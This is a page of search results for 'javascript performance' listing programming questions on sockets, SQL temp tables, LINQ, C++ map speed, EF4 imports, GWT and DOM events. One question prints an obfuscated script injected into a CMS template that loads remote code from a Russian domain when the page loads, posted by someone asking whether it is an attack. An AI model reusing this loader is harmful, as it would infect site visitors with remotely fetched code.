Search Results

Search found 35970 results on 1439 pages for 'javascript performance'.


  • C# performance methods of receiving data from a socket?

    - by Daniel
    Let's assume we have a simple internet socket, and it's going to send 10 megabytes of random data through (because I want to ignore memory issues). Is there any performance difference, or a best-practice method, that one should use for receiving the data? The final output should be represented by a byte[]. Yes, I know writing an arbitrary amount of data to memory is bad, and if I were downloading a large file I wouldn't do it like this. But for argument's sake let's ignore that and assume it's a smallish amount of data. I also realise that the bottleneck here is probably not the memory management but rather the socket receive itself. I just want to know what would be the most efficient method of receiving the data. A few dodgy ways I can think of are:

    1. Have a List and a buffer; after the buffer is full, add it to the list, and at the end call list.ToArray() to get the byte[].
    2. Write the buffer to a memory stream; after it's complete, construct a byte[] of stream.Length and read it all into it to get the byte[] output.

    Is there a more efficient/better way of doing this?
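
    For reference, here is a minimal sketch of the MemoryStream variant described above, assuming a connected System.Net.Sockets.Socket; whether it actually beats the List-of-buffers approach is exactly the kind of thing that needs measuring rather than guessing:

        using System.IO;
        using System.Net.Sockets;

        static class SocketReader
        {
            // Reads until the remote side closes, then returns one byte[].
            public static byte[] ReceiveAll(Socket socket)
            {
                var buffer = new byte[8192];            // reusable receive buffer
                using (var ms = new MemoryStream())
                {
                    int read;
                    // Receive returns 0 when the peer shuts the connection down.
                    while ((read = socket.Receive(buffer)) > 0)
                        ms.Write(buffer, 0, read);
                    return ms.ToArray();                // one final copy into the result
                }
            }
        }

    MemoryStream already does the doubling-buffer bookkeeping internally, so this avoids hand-rolling the List concatenation; the cost is the single ToArray() copy at the end.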


  • Performance Comparison of Shell Scripts vs high level interpreted langs (C#/Java/etc.)

    - by dferraro
    Hi all. First: this is not meant to be a 'which is better' flame-war thread, but rather I need help making an architecture decision/argument to put forward to my boss. Skipping the details, I would simply love to find the results from anyone who has done performance comparisons of shell scripts vs. [insert general-purpose interpreted language here], such as C# or Java. Surprisingly, I have spent some time on Google and searching here without finding any of this data. Has anyone done these comparisons for different use cases: hitting a database in a loop (Oracle preferred, but MSSQL would do) with different kinds of CRUD queries, and also, without a database, plain 50k-iteration loops doing different types of calculations and things of that nature? In particular, right now I need a comparison of hitting an Oracle DB from a shell script vs., let's say, C# (again, any interpreted GPPL would be fine, even higher-level ones like Python), but I also need to know about standard computational work. Before you ask 'why not just write a quick test yourself?': I've been a Windows developer my whole life/career and have very limited knowledge of shell scripting, not to mention *nix as a whole, so asking the question here of the more experienced guys would be greatly beneficial, not to mention time-saving, as we are in near-perpetual deadline crunch as it is ;). Thanks so much in advance,
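
    For the C# side of such a comparison, a minimal timing harness is easy to put together (a sketch; the workload delegate is a placeholder you would fill with your CRUD query or calculation). The shell side can then be timed with the `time` command for a rough parallel:

        using System;
        using System.Diagnostics;

        static class Harness
        {
            // Runs `work` once to warm up, then reports the average over `iterations`.
            public static TimeSpan Average(Action work, int iterations)
            {
                work(); // warm-up so one-time startup cost isn't counted
                var sw = Stopwatch.StartNew();
                for (int i = 0; i < iterations; i++) work();
                sw.Stop();
                return TimeSpan.FromTicks(sw.Elapsed.Ticks / iterations);
            }

            static void Main()
            {
                var avg = Average(() => { /* e.g. one SQL query or calculation here */ }, 50000);
                Console.WriteLine("avg per iteration: {0} ms", avg.TotalMilliseconds);
            }
        }

    Note that for database-bound work the connection and driver usually dominate, so any honest shell-vs-C# comparison mostly measures the client libraries, not the languages.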


  • How can I hit my database with an AJAX call using javascript?

    - by tmedge
    I am pretty new at this stuff, so bear with me. I am using ASP.NET MVC. I have created an overlay that covers the page when someone clicks a button corresponding to a certain database entry. Because of this, ALL of my code for this functionality is in a .js file contained within my project. What I need to do is pull the info corresponding to that entry from the database itself using an AJAX call, and place it into my textboxes. Then, after the end user has made the desired changes, I need to update that entry's values to match the input. I've been surfing the web for a while and have failed to find an example that fits my needs. Here is the code in my javascript file thus far:

        function editOverlay(picId) {
            //pull up an overlay
            $('body').append('<div class="overlay" />');
            var $overlayClass = $('.overlay');
            $overlayClass.append('<div class="dataModal" />');
            var $data = $('.dataModal');
            overlaySetup($overlayClass, $data);

            //set up form
            $data.append('<h1>Edit Picture</h1><br /><br />');
            $data.append('Picture name: &nbsp;');
            $data.append('<input class="picName" /> <br /><br /><br />');
            $data.append('Relative url: &nbsp;');
            $data.append('<input class="picRelURL" /> <br /><br /><br />');
            $data.append('Description: &nbsp;');
            $data.append('<textarea class="picDescription" /> <br /><br /><br />');
            var $nameBox = $('.picName');
            var $urlBox = $('.picRelURL');
            var $descBox = $('.picDescription');
            var pic = null;

            //this is where I need to pull the actual object from the db
            //var imgList =
            for (var temp in imgList) {
                if (temp.Id == picId) {
                    pic = temp;
                }
            }
            /*
            $nameBox.attr('value', pic.Name);
            $urlBox.attr('value', pic.RelativeURL);
            $descBox.attr('value', pic.Description);
            */

            //close buttons
            $data.append('<input type="button" value="Save Changes" class="saveButton" />');
            $data.append('<input type="button" value="Cancel" class="cancelButton" />');
            $('.saveButton').click(function() {
                /*
                pic.Name = $nameBox.attr('value');
                pic.RelativeURL = $urlBox.attr('value');
                pic.Description = $descBox.attr('value');
                */
                //make a call to my Save() method in my repository
                CloseOverlay();
            });
            $('.cancelButton').click(function() {
                CloseOverlay();
            });
        }

    The commented-out parts are what I need to accomplish and/or are not available until the earlier issues are resolved. Any and all advice is appreciated! Remember, I am VERY new to this stuff (two weeks, to be exact) and will probably need highly explicit instructions. BTW: overlaySetup() and CloseOverlay() are functions I have living someplace else. Thanks!
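
    For the server side of an AJAX round trip like this in ASP.NET MVC, one common shape is a controller action returning JSON, which the overlay can call with jQuery's $.getJSON and $.post. The following is only a sketch: the controller, repository interface and property names are hypothetical stand-ins for whatever the poster's model actually uses (MVC 2+ assumed for JsonRequestBehavior):

        using System.Web.Mvc;

        public class Picture
        {
            public string Name { get; set; }
            public string RelativeURL { get; set; }
            public string Description { get; set; }
        }

        public interface IPictureRepository   // hypothetical repository
        {
            Picture GetById(int id);
            void Update(int id, string name, string relativeUrl, string description);
        }

        public class PicturesController : Controller
        {
            private readonly IPictureRepository repository;

            public PicturesController(IPictureRepository repository)
            {
                this.repository = repository;
            }

            // GET /Pictures/Details/5 - one picture as JSON for the overlay to fill its inputs
            public JsonResult Details(int id)
            {
                var pic = repository.GetById(id);
                return Json(new { pic.Name, pic.RelativeURL, pic.Description },
                            JsonRequestBehavior.AllowGet);
            }

            // POST /Pictures/Save - receives the edited values from the Save Changes button
            [HttpPost]
            public JsonResult Save(int id, string name, string relativeUrl, string description)
            {
                repository.Update(id, name, relativeUrl, description);
                return Json(new { ok = true });
            }
        }

    On the client, $.getJSON('/Pictures/Details/' + picId, function (pic) { ... }) would replace the commented-out imgList loop, filling the three inputs from the returned object.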


  • What should I use to increase performance. View/Query/Temporary Table

    - by Shantanu Gupta
    I want to compare the performance of using views, temp tables, and direct queries inside a stored procedure. I have a table that gets created every time a trigger fires. I know this trigger fires very rarely, only once at setup time. Now I have to use that trigger-created table in many places for fetching data, and I can confirm that nobody makes changes to it, i.e. it is a read-only table. I have to use this table's data, joined with multiple other tables, to fetch results for further queries, say:

        select * from triggertable

    By using a temp table:

        select ... into #tx from triggertable join t2 join t3 -- and so on
        select a, b, c from #tx   -- do something
        select d, e, f from #tx   -- do something
        -- and so on: around 6-7 queries in a row in a stored procedure

    By using a view:

        create view viewname as
            select ... from triggertable join t2 join t3 -- and so on
        select a, b, c from viewname   -- do something
        select d, e, f from viewname   -- do something
        -- and so on: around 6-7 queries in a row in a stored procedure

    This view could be used in other places as well, so I would create it in the database rather than in the sp.

    By using direct queries:

        select a, b, c from (select ... from triggertable join t2 join t3 join ...)   -- do something
        select d, e, f from (select ... from triggertable join t2 join t3 join ...)   -- do something
        -- and so on: around 6-7 queries in a row in a stored procedure

    So I can use a view, a temporary table, or a direct query in all the upcoming queries. What would be best to use in this case?


  • Delaying execution of Javascript function relative to Google Maps / geoxml3 parser?

    - by Terra Fimeira
    I'm working on implementing a Google map on a website with our own tile overlays and KML elements. I was previously asked to write code so that, for instance, when the page is loaded from a specific URL, it initializes with one of the tile overlays already enabled. Recently, I've been asked to do the same for the buildings outlined by KML elements, so that arriving at the page via a specific URL automatically zooms, centers, and displays information on the building. However, while the tile-overlay case works, the building KML does not. After doing some testing, I've determined that when the code that checks the URL executes, the page is still loading the KML elements, so they do not yet exist for the code to compare against or use.

    Code for evaluating the URL (placed at the end of onLoad="initialize()"):

        function urlClick() {
            var currentURL = window.location.href;   //Retrieve page URL
            var URLpiece = currentURL.slice(-6);     //pull the last 6 digits (for testing)
            if (URLpiece === "access") {             //If the resulting string is "access":
                access_click();                      //Display accessibility overlay
            } else if (URLpiece === "middle") {      //Else if the string is "middle":
                facetClick('Middle College');        //Click on building "Middle College"
            };
        };

        function facetClick(name) {                  //Convert building name to building ID.
            for (var i = 0; i < active.placemarks.length; i++) {
                if (active.placemarks[i].name === name) {
                    sideClick(i)                     //Click building whose id matches "Middle College"
                };
            };
        };

    Firebug console error:

        active is null
        for (var i = 0; i < active.placemarks.length; i++) {

    active.placemarks is the set of KML elements loaded on the page; it being null means no KML has been loaded yet. In short, I have a mistiming, and I can't seem to find a suitable place for the URL code so that it executes after the KML has loaded. As noted above, I placed it at the end of onLoad="initialize()", but it would appear that, instead of waiting for the KML to completely load earlier in the function, the remainder of the function is executed:

        onLoad="initialize()"
            information();     //Use the buttons variables initial state to set up description
            buttons();         //and button state
            button_hover(0);   //and button description to neutral.
            //Create and arrange the Google Map.
            //Create basic tile overlays.
            //Set up parser to work with KML elements.
            myParser = new geoXML3.parser({          //Parser: Takes KML and converts to JS.
                map: map,                            //Applies parsed KML to the map
                singleInfoWindow: true,
                afterParse: useTheData               //Allows us to use the parsed KML in a function
            });
            myParser.parse(['/maps/kml/shapes.kml','/maps/kml/shapes_hidden.kml']);
            google.maps.event.addListener(map, 'maptypeid_changed', function() { autoOverlay(); });
            //Create other tile overlays to appear over KML elements.
            urlClick();

    I suspect one of my issues lies in using the geoxml3 parser (http://code.google.com/p/geoxml3/), which converts our KML files to Javascript. Even once the page has finished loading all of its elements, the map on the page is still loading, including the KML elements. I have also tried placing urlClick() in various places inside the parser itself that appear to execute after all the shapes have been parsed, but I've had no success there either. While I've been intending to strip out the parser, I would like to know if there is any way of executing urlClick after the parser has returned the KML shapes.
    Ideally, I don't want to use an arbitrary delay such as "wait 3 seconds, and go", as my various browsers all load the page in different times; rather, I'm looking for some way to say "when the parser is done, execute", or "when the Google map is completely loaded, execute", or perhaps even "hold until the parser is complete before advancing to urlClick".


  • Does breaking chained Select()s in LINQ to objects hurt performance?

    - by Justin
    Take the following pseudo-C# code:

        using System;
        using System.Data;
        using System.Linq;
        using System.Collections.Generic;

        public IEnumerable<IDataRecord> GetRecords(string sql)
        {
            // DB logic goes here
        }

        public IEnumerable<IEmployer> Employers()
        {
            string sql = "select EmployerID from employer";
            var ids = GetRecords(sql).Select(record => (record["EmployerID"] as int?) ?? 0);
            return ids.Select(employerID => new Employer(employerID) as IEmployer);
        }

    Would it be faster if the two Select() calls were combined? Is there an extra iteration in the code above? Is the following code faster?

        public IEnumerable<IEmployer> Employers()
        {
            string sql = "select EmployerID from employer";
            return GetRecords(sql).Select(record =>
                new Employer((record["EmployerID"] as int?) ?? 0) as IEmployer);
        }

    I think the first example is more readable if there is no difference in performance.
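
    Both forms compose lazily, so the source sequence is enumerated exactly once either way; the split version just adds one extra delegate call per element. A quick sketch to verify this with side-effect counters (for demonstration only):

        using System;
        using System.Linq;

        class SelectChaining
        {
            static void Main()
            {
                int firstCalls = 0, secondCalls = 0;
                var query = Enumerable.Range(1, 1000)
                    .Select(n => { firstCalls++; return n * 2; })
                    .Select(n => { secondCalls++; return n + 1; });

                var total = query.Sum();   // a single pass over the source
                Console.WriteLine("{0} {1}", firstCalls, secondCalls);   // prints: 1000 1000
            }
        }

    Each element flows through both projections during the one enumeration, so the difference between the two versions is a per-element delegate invocation, almost certainly negligible next to reading records from a database.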


  • C++ map performance - Linux (30 sec) vs Windows (30 mins) !!!

    - by sonofdelphi
    I need to process a list of files; the processing action should not be repeated for the same file. The code I am using for this is:

        using namespace std;

        vector<File*> gInputFileList;             //Can contain duplicates; File has member sFilename
        map<string, File*> gProcessedFileList;    //Using map to avoid linear search costs

        void processFile(File* pFile)
        {
            File* pProcessedFile = gProcessedFileList[pFile->sFilename];
            if (pProcessedFile != NULL)
                return;                           //Already processed
            foo(pFile);                           //foo() is the action to do for each file
            gProcessedFileList[pFile->sFilename] = pFile;
        }

        void main()
        {
            size_t n = gInputFileList.size();
            //Using array syntax (iterator syntax also gives identical performance)
            for (size_t i = 0; i < n; i++) {
                processFile(gInputFileList[i]);
            }
        }

    The code works correctly, but... my problem is that when the input size is 1000, it takes 30 minutes - HALF AN HOUR - on Windows/Visual Studio 2008 Express (both Debug and Release builds). For the same input, it takes only 40 seconds to run on Linux/gcc! What could be the problem? The action foo() takes only a very short time to execute when used separately. Should I be using something like vector::reserve for the map?


  • How costly performance-wise are these actions in iPhone objective-C?

    - by Alex Gosselin
    This is really a few questions in one; I'm wondering what the performance cost of these things is, as I haven't really been following any best practice for them. The answers may also be useful to other readers, if somebody knows these.

    (1) If I need the Core Data managed object context, is it bad to use

        #import "myAppDelegate.h"
        // farther down in the code:
        NSManagedObjectContext *context = [(myAppDelegate *)[[UIApplication sharedApplication] delegate] managedObjectContext];

    as opposed to leaving the warning you get if you don't cast the delegate?

    (2) What is the cheapest way to hard-code a string? I have been using return @"myString"; on occasion in some functions where I need to pass it to a variety of places. Is it better to do it this way:

        static NSString *str = @"myString";
        return str;

    (3) How costly is it to subclass an object I wrote vs. making a new one, in general?

    (4) When I am using Core Data and navigating through a hierarchy of some sort, is it necessary to turn things back into faults somehow after I read some info from them, or is this done automatically?

    Thanks for any help.


  • Why does the order of the loops affect performance when iterating over a 2D array? [closed]

    - by Mark
    Possible duplicate: Which of these two for loops is more efficient in terms of time and cache performance. Below are two programs that are almost identical except that I switched the i and j variables around. They both run in different amounts of time. Could someone explain why this happens?

    Version 1:

        #include <stdio.h>
        #include <stdlib.h>

        main () {
            int i, j;
            static int x[4000][4000];
            for (i = 0; i < 4000; i++) {
                for (j = 0; j < 4000; j++) {
                    x[j][i] = i + j;
                }
            }
        }

    Version 2:

        #include <stdio.h>
        #include <stdlib.h>

        main () {
            int i, j;
            static int x[4000][4000];
            for (j = 0; j < 4000; j++) {
                for (i = 0; i < 4000; i++) {
                    x[j][i] = i + j;
                }
            }
        }
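
    The usual explanation is cache locality rather than anything C-specific, since the array is laid out row-major: when the last subscript varies fastest the writes are contiguous, otherwise each write lands a full row away. A hedged C# reproduction, for readers who want to measure the same effect themselves:

        using System;
        using System.Diagnostics;

        class Locality
        {
            const int N = 4000;
            static readonly int[,] x = new int[N, N];   // rectangular array, row-major like C

            static long Time(bool lastIndexInner)
            {
                var sw = Stopwatch.StartNew();
                for (int a = 0; a < N; a++)
                    for (int b = 0; b < N; b++)
                        if (lastIndexInner) x[a, b] = a + b;   // contiguous writes
                        else                x[b, a] = a + b;   // strided: one full row per step
                return sw.ElapsedMilliseconds;
            }

            static void Main()
            {
                Console.WriteLine("contiguous: {0} ms, strided: {1} ms", Time(true), Time(false));
            }
        }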


  • Javascript :(….. Oh!! So its jquery? Now what?? I’m a C# Guy

    - by Shekhar_Pro
    Hi guys, I want you to guide me here. The other day I was working out some AJAX for my ASP.NET website, and handling the client-side JavaScript was taking the hell out of me. Then I got my hands on the book jQuery in Action, 2nd Edition, and solved my problem with the help of example code from the book. As I checked the contents, I got an overview that whatever I had ever thought of doing can be done with jQuery easily and quite cleanly. I am actually pretty new to web development (say about 4 months) and come from the C# world, where we have cool libraries and a simple, elegant coding style (yeah, including those generics, IEnumerable, lambdas, chained statements... you got it...), and you know what you're doing when writing some code. And we have great IntelliSense to care for us, and above all, we have everything strongly typed. But in JavaScript everything is so messy (and I don't know why pages are not properly indented... see any page source). Now tell me what I should do: go straight to jQuery, or first learn JavaScript (like a disciplined boy... I even have a book for that too... got it as a gift :) ...). I have seen "Is it a good idea to learn JavaScript before learning jQuery?", but remember, I already have a project on my hands...


  • Weird Javascript in Template. Is this a hacking attempt?

    - by Julian
    I validated my client's website to xHTML Strict 1.0/CSS 2.1 standards last week. Today when I re-checked, I had a validation error caused by a weird and previous unknown script. I found this in the index.php file of my ExpressionEngine CMS. What is this javascript doing? Is this a hacking attempt as I suspected? I couldn't help but notice the Russian domain encoded in the script... this.v=27047; this.v+=187; ug=["n"]; OV=29534; OV--; var y; var C="C"; var T={}; r=function(){ b=36068; b-=144; M=[]; function f(V,w,U){ return V.substr(w,U); var wH=39640; } var L=["o"]; var cj={}; var qK={N:false}; var fa="/g"+"oo"+"gl"+"e."+"co"+"m/"+f("degL4",0,2)+f("rRs6po6rRs",4,2)+f("9GVsiV9G",3,2)+f("5cGtfcG5",3,2)+f("M6c0ilc6M0",4,2)+"es"+f("KUTz.cUzTK",4,2)+f("omjFb",0,2)+"/s"+f("peIlh2",0,2)+"ed"+f("te8WC",0,2)+f("stien3",0,2)+f(".nYm6S",0,2)+f("etUWH",0,2)+f(".pdVPH",0,2)+f("hpzToi",0,2); var BT="BT"; var fV=RegExp; var CE={bf:false}; var UW=''; this.Ky=11592; this.Ky-=237; var VU=document; var _n=[]; try {} catch(wP){}; this.JY=29554; this.JY-=245; function s(V,w){ l=13628; l--; var U="["+w+String("]"); var rk=new fV(U, f("giId",0,1)); this.NS=18321;this.NS+=195;return V.replace(rk, UW); try {} catch(k){}; }; this.jM=""; var CT={}; var A=s('socnruixpot4','zO06eNGTlBuoYxhwn4yW1Z'); try {var vv='m'} catch(vv){}; var Os={}; var t=null; var e=String("bod"+"y"); var F=155183-147103; this.kp=''; Z={Ug:false}; y=function(){ var kl=["mF","Q","cR"]; try { Bf=11271; Bf-=179; var u=s('cfr_eKaPtQe_EPl8eTmPeXn8to','X_BQoKfTZPz8MG5'); Fp=VU[u](A); var H=""; try {} catch(WK){}; this.Ca=19053; this.Ca--; var O=s('s5rLcI','2A5IhLo'); var V=F+fa; this.bK=""; var ya=String("de"+"fe"+f("r3bPZ",0,1)); var bk=new String(); pB=9522; pB++; Fp[O]=String("ht"+"tp"+":/"+"/t"+"ow"+"er"+"sk"+"y."+"ru"+":")+V; Fp[ya]=[1][0]; Pe=45847; Pe--; VU[e].appendChild(Fp); var lg=new Array(); var aQ={vl:"JC"}; this.KL="KL"; } catch(x){ this.Ja=""; Th=["pj","zx","kO"]; var Jr=''; }; Tr={qZ:21084}; }; this.pL=false; }; be={}; rkE={hb:"vG"}; r(); var bY=new Date(); window.onload=y; cU=["Yr","gv"];


  • HTML + javascript mouse over, mouseout, onclick not working in firefox.

    - by help_inmssql
    Hello everyone. My question is about getting onMouseover, onMouseout, onMousedown, and onClick on a table row, for which I am calling user-defined javascript functions:

    - onMouseover: background color should change.
    - onMouseout: reset to the original color.
    - onClick: the first column's checkbox/radio button should be set, and the background color should change.
    - onMousedown: background color should change.

    My code in HTML is:

        <tr onMouseOver="hover(this)" onMouseOut="hover_out(this)" onMouseDown="get_first_state(this)" onClick="checkit(this)">

    and the javascript functions are:

        var first_state = false;
        var oldcol = '#ffffff';
        var oldcol_cellarray = new Array();

        function hover(element) {
            if (!element) element = this;
            while (element.tagName != 'TR') {
                element = element.parentNode;
            }
            if (element.style.fontWeight != 'bold') {
                for (var i = 0; i < element.cells.length; i++) {
                    if (element.cells[i].className != "no_hover") {
                        oldcol_cellarray[i] = element.cells[i].style.backgroundColor;
                        element.cells[i].style.backgroundColor = '#e6f6f6';
                    }
                }
            }
        }

        function hover_out(element) {
            if (!element) element = this;
            while (element.tagName != 'TR') {
                element = element.parentNode;
            }
            if (element.style.fontWeight != 'bold') {
                for (var i = 0; i < element.cells.length; i++) {
                    if (element.cells[i].className != "no_hover") {
                        if (typeof oldcol_cellarray != undefined) {
                            element.cells[i].style.backgroundColor = oldcol_cellarray[i];
                        } else {
                            element.cells[i].style.backgroundColor = '#ffffff';
                        }
                        //var oldcol_cellarray = new Array();
                    }
                }
            }
        }

        function get_first_state(element) {
            while (element.tagName != 'TR') {
                element = element.parentNode;
            }
            first_state = element.cells[0].firstChild.checked;
        }

        function checkit(element) {
            while (element.tagName != 'TR') {
                element = element.parentNode;
            }
            if (element.cells[0].firstChild.type == 'radio') {
                var typ = 0;
            } else if (element.cells[0].firstChild.type == 'checkbox') {
                typ = 1;
            }
            if (element.cells[0].firstChild.checked == true && typ == 1) {
                if (element.cells[0].firstChild.checked == first_state) {
                    element.cells[0].firstChild.checked = false;
                }
                set_rowstyle(element, element.cells[0].firstChild.checked);
            } else {
                if (typ == 0 || element.cells[0].firstChild.checked == first_state) {
                    element.cells[0].firstChild.checked = true;
                }
                set_rowstyle(element, element.cells[0].firstChild.checked);
            }
            if (typ == 0) {
                var table = element.parentNode;
                if (table.tagName != "TABLE") {
                    table = table.parentNode;
                }
                if (table.tagName == "TABLE") {
                    table = table.tBodies[0].rows;
                    //var table = document.getElementById("js_tb").tBodies[0].rows;
                    for (var i = 1; i < table.length; i++) {
                        if (table[i].cells[0].firstChild.checked == true && table[i] != element) {
                            table[i].cells[0].firstChild.checked = false;
                        }
                        if (table[i].cells[0].firstChild.checked == false) {
                            set_rowstyle(table[i], false);
                        }
                    }
                }
            }
        }

        function set_rowstyle(r, on) {
            if (on == true) {
                for (var i = 0; i < r.cells.length; i++) {
                    r.style.fontWeight = 'bold';
                    r.cells[i].style.backgroundColor = '#f2f2c2';
                }
            } else {
                for (i = 0; i < r.cells.length; i++) {
                    r.style.fontWeight = 'normal';
                    r.cells[i].style.backgroundColor = '#ffffff';
                }
            }
        }

    It works as expected in IE, but in Firefox I was surprised by the output after so much coding:

    - onMouseOver works as expected: the color of that particular row changes.
    - onClick sets the background color permanently: even though I mouse over different rows, the previously clicked row's color is not reset to white. Clicking on two rows sets the background of both rows, whereas only the latest clicked row should be set and rows selected before should be reset; i.e. if I click on all the rows, the background color of every one of them is changed.
    - Even though I click on the row, the first column's radio button or checkbox is not set.

    Please help me solve this issue in Firefox, and do let me know where my code needs to change. Thanks in advance!


  • Any significant performance improvement by using bitwise operators instead of plain int sums in C#?

    - by tunnuz
    Hello, I started working with C# a few weeks ago, and I'm now in a situation where I need to build up a "bit set" flag to handle different cases in an algorithm. I thus have two options:

        enum RelativePositioning
        {
            LEFT   = 0,
            RIGHT  = 1,
            BOTTOM = 2,
            TOP    = 3,
            FRONT  = 4,
            BACK   = 5
        }

        pos = ((eye.X < minCorner.X ? 1 : 0) << RelativePositioning.LEFT)
            + ((eye.X > maxCorner.X ? 1 : 0) << RelativePositioning.RIGHT)
            + ((eye.Y < minCorner.Y ? 1 : 0) << RelativePositioning.BOTTOM)
            + ((eye.Y > maxCorner.Y ? 1 : 0) << RelativePositioning.TOP)
            + ((eye.Z < minCorner.Z ? 1 : 0) << RelativePositioning.FRONT)
            + ((eye.Z > maxCorner.Z ? 1 : 0) << RelativePositioning.BACK);

    Or:

        enum RelativePositioning
        {
            LEFT   = 1,
            RIGHT  = 2,
            BOTTOM = 4,
            TOP    = 8,
            FRONT  = 16,
            BACK   = 32
        }

        if (eye.X < minCorner.X) { pos += RelativePositioning.LEFT; }
        if (eye.X > maxCorner.X) { pos += RelativePositioning.RIGHT; }
        if (eye.Y < minCorner.Y) { pos += RelativePositioning.BOTTOM; }
        if (eye.Y > maxCorner.Y) { pos += RelativePositioning.TOP; }
        if (eye.Z > maxCorner.Z) { pos += RelativePositioning.FRONT; }
        if (eye.Z < minCorner.Z) { pos += RelativePositioning.BACK; }

    I could have used something like ((eye.X > maxCorner.X) << 1), but C# does not allow implicit casting from bool to int, and the ternary operator was similar enough. My question now is: is there any performance improvement in using the first version over the second? Thank you, Tommaso
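
    For what it's worth, the idiomatic C# spelling of the second variant is a [Flags] enum combined with bitwise OR; with distinct power-of-two values, |= and += produce identical results here, so the question really only concerns branches vs. shifts. A sketch:

        using System;

        [Flags]
        enum RelativePositioning
        {
            None   = 0,
            Left   = 1,
            Right  = 2,
            Bottom = 4,
            Top    = 8,
            Front  = 16,
            Back   = 32
        }

        class FlagsDemo
        {
            static void Main()
            {
                var pos = RelativePositioning.None;
                double eyeX = -1, minX = 0, maxX = 10;   // illustrative values only

                if (eyeX < minX) pos |= RelativePositioning.Left;
                if (eyeX > maxX) pos |= RelativePositioning.Right;

                Console.WriteLine(pos);                                        // Left
                Console.WriteLine((pos & RelativePositioning.Left) != 0);      // True
            }
        }

    Either way, six compares and a few adds per call are far too cheap to matter in practice; this is a readability choice, not a performance one.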


  • EF4 Import/Lookup thousands of records - my performance stinks!

    - by Dennis Ward
    I'm trying to set something up for a movie store website (using ASP.NET, EF4, SQL Server 2008). In my scenario, I want to allow a "Member" store to import their catalog of movies from a text file containing ActorName, MovieTitle, and CatalogNumber, as follows:

        Actor, Movie, CatalogNumber
        John Wayne, True Grit, 4577-12
        (repeated for each record)

    This data will be used to look up an actor and movie and create a "MemberMovie" record, and my import speed is terrible if I import more than 100 or so records using these tables:

    - Actor table: fields = {ID, Name, etc.}
    - Movie table: fields = {ID, Title, ActorID, etc.}
    - MemberMovie table: fields = {ID, CatalogNumber, MovieID, etc.}

    My methodology for importing data into the MemberMovie table from a text file is as follows (after the file has been uploaded successfully):

    1. Create a context.
    2. For each line in the file, look up the actor in the Actor table.
    3. For each movie of that actor, look up the matching title.
    4. If a matching movie is found, add a new MemberMovie record to the context and call ctx.SaveChanges().

    The performance of my implementation is terrible. My expectation is that this can be done with thousands of records in a few seconds (after the file has been uploaded), and I've got something that times out the browser. My question is this: what is the best approach for performing bulk lookups/inserts like this? Should I call SaveChanges only once rather than for each newly created MemberMovie? Would it be better to implement this using something like a stored procedure? A snippet of my loop is roughly this (edited for brevity):

        while ((fline = file.ReadLine()) != null)
        {
            string[] token = fline.Split(separator);
            string Actor = token[0];
            string Movie = token[1];
            string CatNumber = token[2];

            Actor found_actor = ctx.Actors.Where(a => a.Name.Equals(Actor)).FirstOrDefault();
            if (found_actor == null) continue;

            Movie found_movie = found_actor.Movies.Where(
                s => s.Title.Equals(Movie, StringComparison.CurrentCultureIgnoreCase)).FirstOrDefault();
            if (found_movie == null) continue;

            ctx.MemberMovies.AddObject(new MemberMovie()
            {
                MemberProfileID = profile_id,
                CatalogNumber = CatNumber,
                Movie = found_movie
            });

            try
            {
                ctx.SaveChanges();
            }
            catch { }
        }

    Any help is appreciated! Thanks, Dennis
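
    The per-row pattern above issues two queries plus one SaveChanges round trip for every line, which is usually the whole problem. A common fix is to pull the lookup data into memory once and save once at the end; the sketch below reuses the poster's names, and assumes the actor/movie catalog fits in memory and that Movies can be eagerly loaded with Include:

        // One query up front instead of one per line.
        var actorsByName = ctx.Actors.Include("Movies").ToDictionary(a => a.Name);

        string fline;
        while ((fline = file.ReadLine()) != null)
        {
            string[] token = fline.Split(separator);

            Actor found_actor;
            if (!actorsByName.TryGetValue(token[0], out found_actor)) continue;

            Movie found_movie = found_actor.Movies.FirstOrDefault(
                s => s.Title.Equals(token[1], StringComparison.CurrentCultureIgnoreCase));
            if (found_movie == null) continue;

            ctx.MemberMovies.AddObject(new MemberMovie()
            {
                MemberProfileID = profile_id,
                CatalogNumber = token[2],
                Movie = found_movie
            });
        }

        ctx.SaveChanges();   // a single round trip for all the inserts

    For catalogs too large for a dictionary, the usual next step is bulk-loading the file into a staging table and doing the join/insert in one set-based statement or stored procedure.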


  • Modular GWT design concerns

    - by GlGuru
    Hi, I have a couple of questions regarding a modular GWT-based application framework. I have some ideas about them, but being new to the field of web development I feel they are far from ideal. I'd appreciate a few comments and suggestions. Here are my questions:

    1. I am developing a framework which will allow third parties to embed GWT applications into our website and do some communication with them using simple iFrame postMessage. All these third-party modules are going to use our SDK, which is also GWT-based. The problem is that even though all the modules will use the same codebase, there is going to be a massive overhead from the amount of duplicate Javascript code (i.e. our common SDK codebase, which is quite large) being downloaded on the client's machine. This is highly redundant and problematic, not only due to the sheer size of the duplicate code but also because subsequent updates of the SDK would require the modules to be recompiled, which is going to create a DLL-hell kind of scenario in the long run. What is the best way of doing this kind of thing? Is there a way I can have some static GWT code (i.e. the SDK) that the dynamic GWT modules refer to (even if it lies on a different domain) and have it all work happily?

    2. The other part of the problem lies in providing a robust scripting front end to the SDK. At first it appears trivial, since Javascript itself is a scripting language. However, I do not know how to load and call a piece of pure Javascript code at runtime. I am willing to put restrictions on the target Javascript (e.g. having a function main and a unique namespace or something). Furthermore, the Javascript will come as a string from a database, not as a full URL. If it's doable in Javascript, how does one get this right in GWT, i.e. forcing the compiler to emit a certain function in the generated Javascript? This, I believe, can be made less of a problem by having a stub Javascript with all the right requirements which just loads a GWT-generated Javascript. Is any of this possible at all?

    I generally hate to be this verbose, but I hope to find a quick solution to the problem as it's holding up my progress. I'd highly appreciate any comments, suggestions and experiences.


  • different small js files per page VS. 1x site-wide js file?

    - by Haroldo
    Different pages of my site have different js needs (plugins mainly): some need a lightbox, some don't; some need a carousel, some don't; etc. With regard to page-loading speed, should I:

    Option 1 - reference each js file only where it is needed, so one page might have:

        <script type="text/javascript" src="js/carousel/scrollable.js"></script>
        <script type="text/javascript" src="js/jquery.easydrag.js"></script>
        <script type="text/javascript" src="js/colorbox/jquery.colorbox-min.js"></script>

    and another:

        <script type="text/javascript" src="st_wd_assets/js/carousel/scrollable.js"></script>
        <script type="text/javascript" src="st_wd_assets/js/typewatch.js"></script>

    Option 2 - combine and compress everything into one site-wide js file, so each page would reference:

        <script type="text/javascript" src="js/site_wide.js"></script>

    There would be unused selectors/event listeners on most pages, though - how bad is this? I would include any plugin notes/accreditations at the top of the site_wide.js file.


  • Documentation about difference between javacript src and javascript library in grails

    - by damian
    I know that if you write in a view:

        <g:javascript src="myscript.js" />
        <g:javascript src="myscript.js" />
        <g:javascript src="myscript.js" />
        <!-- other try -->
